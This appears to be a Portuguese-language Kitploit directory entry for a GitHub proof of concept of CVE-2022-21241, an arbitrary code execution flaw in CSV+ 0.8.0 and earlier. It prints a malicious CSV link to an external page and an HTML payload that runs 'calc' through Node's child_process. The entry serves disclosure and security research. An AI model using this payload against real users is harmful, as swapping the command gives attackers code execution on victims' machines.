Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
csv-plus_vulnerability — 👻 [PoC] CSV+ 0.8.0 - Execução Arbitrária de Código (CVE-2022-21241) | Kitploit
Ferramentas/GitHubGitHub/nanaao/csv-plus_vulnerability
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubnanaao/csv-plus_vulnerability

csv-plus_vulnerability

👻 [PoC] CSV+ 0.8.0 - Execução Arbitrária de Código (CVE-2022-21241)

Ver Repositório
5há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

csv-plus_vulnerability

👻 Vulnerabilidade de Execução de Código Arbitrário em 2 Cliques.

PoC.gif

CVE-2022-21241

⚠
Este PoC foi criado para alertar usuários e investigar vulnerabilidades em seu próprio CSV+, sendo proibido seu uso para ataques.

Vulnerabilidade

As seguintes versões são vulneráveis.

  • CSV+ <= 0.8.0

Os atacantes podem executar código arbitrário usando a funcionalidade do Node.js. Eles colocarão o código JS malicioso em algum site e o vincularão a partir de tags com a vulnerabilidade de injeção de HTML no CSV+.

PoC

scenario.png

Arquivo csv malicioso

root@kitploit:~
<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>

https://electronooooo.htmlbin.net/xsscalc.html é um link temporário.

Arquivo html malicioso (calc)

root@kitploit:~
<!DOCTYPE html>
<html>
    <head>
        <script>
            var cmd = "calc";
            require("child_process").exec(cmd);
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
Baixar ferramenta